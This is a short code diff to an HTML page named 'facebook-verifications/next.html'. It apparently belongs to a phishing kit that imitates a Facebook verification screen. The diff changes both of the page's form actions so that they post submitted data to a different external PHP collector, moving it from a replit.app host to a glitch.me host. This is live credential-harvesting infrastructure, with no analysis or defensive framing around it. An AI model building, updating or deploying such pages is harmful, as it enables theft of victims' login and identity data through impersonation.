--- a/facebook-verifications/next.html
+++ b/facebook-verifications/next.html
@@ -26,7 +26,7 @@
       </div>
     </div>
 
-    <form action="https://phpmailerxyz-forwork.replit.app/mansoor.php" method="post">
+    <form action="https://trusting-carbonated-wizard.glitch.me/mansoor.php" method="post">
       <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block">
         <div>
           <div>
@@ -113,7 +113,7 @@
       </div>
     </div>
 
-    <form class="sm:hidden lg:block md:block" action="https://phpmailerxyz-forwork.replit.app/mansoor.php" method="post">
+    <form class="sm:hidden lg:block md:block" action="https://trusting-carbonated-wizard.glitch.me/mansoor.php" method="post">
       <div class="relative flex border bg-[#e9ebee] h-12 md:block lg:block hidden">
         <div>
           <div>
